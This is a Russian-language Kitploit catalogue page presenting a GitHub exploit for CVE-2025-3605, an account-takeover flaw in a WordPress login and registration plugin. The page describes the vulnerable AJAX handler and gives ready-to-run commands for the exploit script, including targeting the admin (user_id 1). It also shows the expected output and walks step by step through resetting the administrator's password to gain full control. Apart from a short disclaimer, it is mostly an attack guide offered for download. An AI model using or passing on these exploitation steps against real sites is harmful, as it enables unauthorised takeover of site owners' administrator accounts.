Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-3605 — WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 уязвим для повышения привилегий | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-3605
Повышение привилегийАтаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-3605

CVE-2025-3605

WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 уязвим для повышения привилегий

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚀 Руководство по эксплуатации CVE-2025-3605

🛡️ Краткое описание уязвимости

Плагин Frontend Login and Registration Blocks для WordPress (версии <= 1.0.7) уязвим к повышению привилегий через захват учётных записей.
Проблема возникает из-за того, что плагин не проверяет личность пользователя при обновлении конфиденциальных данных, таких как email, через функцию flr_blocks_user_settings_handle_ajax_callback().

✅ Воздействие:
Неаутентифицированный злоумышленник может изменить email администратора, запустить процесс «Забыли пароль» и сбросить пароль администратора, получив полный контроль.


💥 Подтверждение концепции (PoC)

Прилагаемый скрипт на Python автоматизирует процесс эксплуатации, обращаясь к уязвимой конечной точке AJAX:

root@kitploit:~
/wp-admin/admin-ajax.php

Он обновляет email целевого пользователя (обычно user_id 1 для администратора) на email, контролируемый злоумышленником.


📦 Включённый скрипт

Имя файла: CVE-2025-3605.py

root@kitploit:~
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail [email protected]

✅ Значения по умолчанию:

  • --user_id: 1 (администратор по умолчанию)
  • --mail: [email protected]

🖥️ Использование и справка

Чтобы увидеть справку, выполните:

root@kitploit:~
python CVE-2025-3605.py --help

Вывод:

root@kitploit:~
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]

Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target URL, e.g., http://192.168.100.74:888/wordpress
  --user_id, -id USER_ID
                        User ID to target (default: 1)
  --mail, -mail MAIL    Email to set (default: [email protected])

✅ Пример запуска:

root@kitploit:~
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail [email protected]

🎯 Ожидаемый вывод

✅ При успехе:

root@kitploit:~
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )

❌ При неудаче:

root@kitploit:~
[!] Exploit failed. HTTP Status: 400
[!] Response: 0

🔑 После эксплуатации

1️⃣ Перейдите по адресу:

root@kitploit:~
http://target-site/wordpress/wp-login.php

2️⃣ Введите новый email, который вы указали ([email protected]).

3️⃣ Запросите сброс пароля.

4️⃣ Установите новый пароль.

5️⃣ Войдите как администратор и получите полный доступ.


⚠️ Отказ от ответственности

Этот эксплойт и скрипт предоставляются только для образовательных целей и санкционированного тестирования.
Любое несанкционированное использование в системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.


Автор: Khaled Alenazi (Nxploited)

Скачать инструмент